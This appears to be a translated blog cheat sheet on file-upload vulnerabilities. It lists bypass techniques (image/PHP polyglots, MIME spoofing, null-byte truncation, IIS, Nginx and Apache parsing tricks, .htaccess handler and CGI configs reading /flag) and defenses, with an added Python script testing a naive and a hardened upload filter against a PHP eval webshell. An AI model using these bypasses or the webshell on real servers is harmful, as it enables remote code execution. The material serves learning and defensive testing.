File upload summary

File Upload

1. Principle

The upload function does not strictly check the uploaded file (its extension, its declared type, or its content), so an attacker can upload a malicious script and get the server to execute it.

2. Harm

Upload a webshell and gain code execution with the web server's permissions.

3. Judgment and possible location

a. Judgment

The target lets you upload a file, you can find the path it was saved to, and the saved file can be executed.

b. Possible location

Any upload point, database backup functions, template editing.

4. Basic use

Upload the file, find the upload path, and find a way to get the script executed.

5. Bypass

  • a. File header detection---use an image webshell (a valid image with PHP appended). On Windows, use the copy command to join the image and the small shell: /b reads the image as binary and /a reads the script as text.
    copy 1.gif/b + shell1.php/a shell2.php
    If the extension is also checked, name the output shell2.jpg and rely on one of the parsing tricks in f. or on file inclusion (i.) to execute it.
  • b. Client-side JS detection---disable JavaScript, or upload a .jpg and change the extension to .php in Burp.
  • c. Blacklist detection---use a suffix the list does not cover or a case variation, such as Asp, Aspx, asa, phtml, php3, php5.
  • d. MIME type detection---change the Content-Type of the file part to image/jpeg (or image/gif) in Burp; only the declared type is checked, not the content.
  • e. Null-byte truncation---upload 1.php+.jpg and, in Burp's hex view, change the + (0x2B) to 0x00. The check sees .jpg, but the file is saved as 1.php because the path is cut at the null byte. Requires PHP before 5.3.4 and magic_quotes_gpc off.
  • f. Exploit parsing vulnerabilities:
    IIS 6.0 parsing vulnerability---1.asp;xx.jpg is executed as ASP, because everything after the semicolon is ignored (a directory named xx.asp/ likewise makes every file inside it run as ASP).
    IIS 7.0/7.5 (PHP via FastCGI) and Nginx parsing vulnerability---www.wenjian.com/test.jpg/noexist.php (put the PHP code in test.jpg; noexist.php need not exist). With cgi.fix_pathinfo=1, PHP falls back to the existing file test.jpg and executes it as PHP.
    Apache file parsing vulnerability---upload webshell.php.aa.bb. When mod_php is configured with AddHandler, Apache walks the extensions from right to left until it finds one it knows, so .bb and .aa are skipped and the file is handled as PHP. This bypasses a blacklist that only looks at the last extension.
  • g. Content detection---avoid the strings the filter looks for: use a webshell built without alphanumeric characters, use commas instead of semicolons where the syntax allows, and use the short tag <?= instead of <?php.
  • h. Secondary rendering bypass---the server re-encodes (renders) uploaded images. Upload an image, download the rendered copy, compare it with the original, and place the one-line shell in a region the renderer leaves unchanged.
  • i. Combine with a file inclusion vulnerability---upload an image containing PHP code and have a vulnerable include() load it.
  • j. .htaccess upload
    Upload a .htaccess file first, then upload the shell with an image extension; the server will parse any file whose name matches as PHP:
    <FilesMatch "shell">  # "shell" is (part of) the uploaded file's name
    SetHandler application/x-httpd-php
    </FilesMatch>

    .htaccess can also enable CGI so that uploaded bash scripts are executed. Upload a .htaccess and a solve.sh (this needs AllowOverride Options, or All, for the upload directory).
    .htaccess

    Options +ExecCGI
    AddHandler cgi-script .sh

    solve.sh (the empty echo after the header is required: a CGI response needs a blank line between headers and body, otherwise Apache reports a malformed header)

    #!/bin/bash
    echo "Content-Type: text/plain"
    echo ""
    cat /flag
    exit 0

6. Defense

Verify the upload path and randomly rename uploaded files, keeping only a whitelisted extension (whitelist, never blacklist, and the check must cover every extension in the name, not just the last one, and reject null bytes and control characters). Deny script execution in the upload directory, or store uploads outside the web root and serve them through a handler. Check the content as well as the name: verify the magic bytes and, for images, re-encode them so that appended PHP does not survive. Disable .htaccess overrides in the upload directory (AllowOverride None) and set cgi.fix_pathinfo=0 on php-fpm so the parsing tricks above do not apply.
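The following Python script is an added example, not code from the original post. It models the naive blacklist check that the bypasses in section 5 defeat beside a hardened check that follows the advice in section 6, and runs both over filenames built from those bypass tricks (case variation, uncommon suffix, null byte, IIS semicolon, Apache multi-extension, .htaccess, GIF/PHP polyglot). The blacklist, whitelist, filenames, 1x1 GIF and shell payload are all constructed here for illustration.

```python
import os
import re
import secrets

# Naive check modelled on the kind of filter section 5 bypasses:
# case-sensitive blacklist applied to the text after the LAST dot only.
BLACKLIST = {"php", "asp", "aspx", "jsp"}

def naive_allowed(filename: str) -> bool:
    """Accept unless the final extension is on the blacklist."""
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    return ext not in BLACKLIST

# Hardened check following section 6: whitelist + magic bytes for each type.
WHITELIST = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}

def hardened_allowed(filename: str, content: bytes) -> bool:
    """Whitelist the extension, inspect the whole name, and check the content."""
    # Drop any directory part; reject dotfiles (.htaccess), control bytes
    # (null-byte truncation) and ';' (IIS 6.0 parsing trick).
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or name.startswith(".") or re.search(r"[\x00-\x1f;]", name):
        return False
    parts = name.lower().split(".")
    if len(parts) != 2:  # exactly one extension: blocks webshell.php.aa.bb
        return False
    ext = parts[1]
    if ext not in WHITELIST or not content.startswith(WHITELIST[ext]):
        return False
    # A correct header is not proof of a clean image (GIF89a + PHP passes it),
    # so also refuse PHP open tags. Production code should re-encode the image
    # instead (the "secondary rendering" of section 5h), which is the real fix.
    return b"<?" not in content

def stored_name(ext: str) -> str:
    """Random on-disk name with a whitelisted extension; the client name is discarded."""
    return f"{secrets.token_hex(16)}.{ext}"

def build_polyglot(shell: bytes) -> bytes:
    """Python equivalent of `copy 1.gif/b + shell1.php/a shell2.php`."""
    return b"GIF89a" + shell

# Constructed sample data.
REAL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
            b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")  # 1x1 GIF
PHP_SHELL = b"<?php @eval($_POST['x']); ?>"

CASES = [
    ("photo.gif", REAL_GIF),                                # legitimate upload
    ("shell.php", PHP_SHELL),                               # direct upload
    ("shell.Asp", PHP_SHELL),                               # 5c: case variation
    ("shell.phtml", PHP_SHELL),                             # 5c: suffix not listed
    ("1.php\x00.jpg", PHP_SHELL),                           # 5e: null-byte truncation
    ("1.asp;xx.jpg", PHP_SHELL),                            # 5f: IIS 6.0 ';' parsing
    ("webshell.php.aa.bb", PHP_SHELL),                      # 5f: Apache right-to-left
    (".htaccess", b"SetHandler application/x-httpd-php"),   # 5j: .htaccess upload
    ("shell2.gif", build_polyglot(PHP_SHELL)),              # 5a: header check bypass
]

def evaluate() -> dict:
    """Map each constructed filename to (naive_allowed, hardened_allowed)."""
    return {name: (naive_allowed(name), hardened_allowed(name, data))
            for name, data in CASES}

if __name__ == "__main__":
    for name, (naive, hard) in evaluate().items():
        verdict = lambda ok: "ALLOW" if ok else "block"
        print(f"{name!r:26} naive={verdict(naive)}  hardened={verdict(hard)}")
```

Every bypass filename passes the naive check and only the real GIF passes the hardened one. The `<?` scan is a stand-in for re-encoding: an innocent image can contain those two bytes by chance, which is why section 6 recommends rendering the image rather than grepping it.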

Origin blog.51cto.com/14930083/2532530